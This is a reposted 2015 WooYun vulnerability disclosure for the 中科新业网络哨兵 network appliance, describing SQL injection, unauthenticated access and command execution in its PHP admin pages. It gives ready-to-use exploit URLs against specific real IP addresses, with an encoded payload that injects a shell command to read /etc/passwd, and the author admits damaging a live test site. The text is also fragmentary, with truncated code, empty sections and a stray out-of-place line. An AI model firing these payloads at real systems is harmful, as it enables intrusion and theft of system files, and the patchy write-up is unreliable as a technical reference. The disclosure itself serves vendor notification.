Board logo

标题: 中科新业网络哨兵 多处sql注射/命令执行/文件下载 [打印本页]
作者: Zeus    时间: 2015-10-6 21:56     标题: 中科新业网络哨兵 多处sql注射/命令执行/文件下载

漏洞概要
缺陷编号:        WooYun-2015-123366
漏洞标题:        中科新业网络哨兵 多处sql注射/命令执行/文件下载
相关厂商:        中科新业
漏洞作者:        menmen519
提交时间:        2015-07-02 11:29
公开时间:        2015-10-01 13:38
漏洞类型:        SQL注射漏洞
危害等级:        高
自评Rank:        11
漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:        http://www.wooyun.org
Tags标签:php源码分析

漏洞详情披露状态:
2015-07-02:        细节已通知厂商并且等待厂商处理中
2015-07-03:        厂商已经确认,细节仅向厂商公开
2015-07-06:        细节向第三方安全合作伙伴开放
2015-08-27:        细节向核心白帽子及相关领域专家公开
2015-09-06:        细节向普通白帽子公开
2015-09-16:        细节向实习白帽子公开
2015-10-01:        细节向公众公开

简要描述:中科新业网络哨兵 两处sql注射/全局导出越权
详细说明:changauthprioritystatus.php:


code 区域session_start( );

...
 shutting down at 23:26:17







下来同样的原理



changauthprioritystatus_ucwiz.php:


code 区域session_start( );
require_once( "../../../include/globalvar.h" );
...



这里虽然位于admin下面但是,也是无权限验证



下来我们看,越权行为,无需登录即可触发




https://219.134.131.244/ucenter/include/changauthprioritystatus.php?par=xx





命令执行:

admin/export.php:


code 区域<?php
/*********************/
/*                   */
/*  Dezend for PHP5  */
/*         NWS       */
/*      Nulled.WS    */
/*                   */
/*********************/

include( "../include/globalvar.h" );



文件下载:









命令为" & cat /etc/p & "

url:

https://220.165.220.62/ucenter/admin/export.php?gCommand=zero_tools&cmd=IiAmIGNhdCAvZXRjL3Bhc3N3ZCAmICI%3D



返回来的文件内容就是命令执行后读取的文件



https://218.108.62.254/ucenter/admin/export.php?gCommand=zero_tools&cmd=IiAmIGNhdCAvZXRjL3Bhc3N3ZCAmICI%3D




admin/addmacwhitelist.php


code 区域session_start( );
header( "Expires: Mon, 26 Jul 2000 05:00:00 GMT" );
header( "Last-Modified: ".gmdate( "D, d M Y H:i:s" )."GMT" );
...


发送url:












命令执行:

admin/exchange.php:


code 区域session_start( );
header( "Content-Type: text/html; charset=GB2312" );
include( "../include/globalvar.h" );
include( "../include/connectdb.php" );
require_once( "../include/WriteLog.php" );
...


命令执行 这里就不多解释了



eg:




再次给道个歉,测试站点被测试坏了,哎,差点吓尿了,期初以为删了站点,现在看来是某个命令执行,导致删除了某个配置文件导致,最后补充,这个功能好像不是所有的产品都具有的,只有一部分





漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云
漏洞回应
厂商回应:危害等级:高
漏洞Rank:11
确认时间:2015-07-03 13:37
厂商回复:CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。
最新状态:暂无




欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/) Powered by Discuz! 6.0.0